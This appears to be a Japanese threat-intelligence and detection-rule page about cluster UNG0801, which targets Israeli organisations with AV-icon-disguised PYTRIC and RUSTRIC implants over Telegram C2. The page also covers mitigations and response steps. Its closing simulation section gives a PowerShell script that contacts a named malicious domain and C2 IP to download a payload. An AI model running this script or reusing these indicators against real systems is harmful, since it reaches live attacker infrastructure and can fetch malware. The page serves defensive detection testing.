UNG0801: AVアイコン偽装でイスラエルを狙った脅威活動
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
このレポートは、イスラエルの組織を標的とし、アンチウイルスのアイコンを偽装するペイロードを配信するために悪意のあるPDFおよびWord文書を武器とする2つの関連キャンペーンを概説しています。一方のトラックではPYTRICというPyInstallerでパッケージ化されたPythonインプラントを落とし込み、もう一方ではマクロを有効にしたWord文書を通じてRustベースのインプラントRUSTRICを配信します。どちらのペイロードもホストの詳細を収集し、システムコマンドを実行し、インストールされたセキュリティソフトウェアを調査します。PYTRICには追加で破壊的機能も含まれています。配信はスピアフィッシング添付ファイルとクラウドにホストされたリンク(Dropboxを含む)によって駆動され、コマンドと制御にはTelegramが使用されています。
調査
SEQRITE Labsは初期のフィッシングルアーを分析し、埋め込まれたマクロを抽出し、ドロップされたペイロードチェーンを再構築しました。PYTRICはファイル探索と消去ルーチンを備えたPyInstallerバンドルであることが確認され、アナリストたちはBackup2040に関連付けられたTelegramボットの資格情報を観察しました。RUSTRICは28のアンチウイルス製品をチェックし、WMIを使用して16進数エンコードされたペイロードをトリガーするRustバイナリとしてプロファイルされました。インフラストラクチャの分析により、配信がDropboxリンク及び netvigil.org.
緩和策
ユーザーに対して未承諾のPDFやWord添付ファイルを特にセキュリティツールやAV関連のユーティリティとして提示されるファイルを慎重に扱うように訓練します。メールセキュリティを設定してマクロを含むドキュメントをブロックし、クラウドストレージホストに指すURLを警告または制限します。エンドポイントでは、PyInstallerの実行、異常なWMIプロセスの作成、whoami、hostname、nslookupなどの組み込みユーティリティの不審な呼び出しを監視します。特定された悪質なドメインやIPのブロックは、感染パスをさらに妨害することができます。
対応策
活動が検出された場合、影響を受けたシステムを隔離し、揮発性データを保存し、ハッシュベースのトリアージのために悪意のある文書を収集します。不審なWMIが生成したプロセスを停止し、一般的な配布場所(ダウンロードフォルダなど)からドロップされたペイロードを削除します。ファイル削除や消去活動のフォレンジック検証を行い、潜在的に露出した資格情報をリセットし、フォローオンのTelegram C2通信を監視します。
攻撃フロー
検出
可能なTelegramの悪用としてのコマンド&コントロールチャンネル(dns_query経由)
表示
可能なデータ流入/流出/第三者サービス/ツールを通じたC2(dns経由)
表示
可能なシステム列挙(cmdline経由)
表示
検出するためのIoC(SourceIP):イスラエルを標的としたAVアイコン偽装に執着する脅威クラスターUNG0801の追跡
表示
検出するためのIoC(DestinationIP):イスラエルを標的としたAVアイコン偽装に執着する脅威クラスターUNG0801の追跡
表示
検出するためのIoC(HashSha256):イスラエルを標的としたAVアイコン偽装に執着する脅威クラスターUNG0801の追跡
表示
特定のドメインとIPを使用したC2通信[Windowsネットワーク接続]
表示
Operation IconCatにおける悪意のあるPDFおよびインプラントの実行検出[Windowsプロセス作成]
表示
シミュレーション実行
前提条件:テレメトリー&ベースラインのプリフライトチェックが通過している必要があります。
根拠:このセクションは、検出ルールをトリガーするために設計された攻撃者の技術(TTP)の正確な実行を詳述しています。コマンドとナラティブは識別されたTTPsを直接反映し、検出ロジックによって期待される正確なテレメトリーを生成することを目的とする必要があります。抽象的または無関連な例は誤診につながります。
-
攻撃シナリオ&コマンド:
攻撃者は事前にドメインを登録し stratioai.org を 159.198.68.25 (侵害されたVPS)に解決されるように設定しました。PowerShellの1行で、C2ビーコンを起動し、小さなペイロードをダウンロードして、その後永続的なリバースシェルを維持します。アウトバウンド接続はHTTPS(ポート443)で行われ、通常のトラフィックと混合しますが、ファイアウォールは宛先IPとDNSクエリを記録し、シグマルールを満たします。 -
回帰テストスクリプト:
# ------------------------------------------------- # 検出検証用のシミュレートされたC2ビーコン # ------------------------------------------------- # 1. 悪意のあるドメインを解決(DNSクエリを強制する) $maliciousDomain = "stratioai.org" $resolved = [System.Net.Dns]::GetHostAddresses($maliciousDomain) Write-Host "Resolved $maliciousDomain to $($resolved -join ', ')" # 2. 悪意のあるIP(C2)へのHTTPS接続を確立する $maliciousIP = "159.198.68.25" $url = "https://$maliciousDomain/payload.bin" try { $response = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10 Write-Host "C2 request succeeded, size: $($response.ContentLength) bytes" } catch { Write-Error "C2 request failed: $_" } # 3. オプション:30秒間チャネルを保持する Start-Sleep -Seconds 30 # ------------------------------------------------- -
クリーンアップコマンド:
# 一時ファイルを削除する(このスクリプトで作成されるものはありません) # 偶発的な再利用を避けるためにDNSキャッシュをクリアする ipconfig /flushdns Write-Host "クリーンアップ完了。"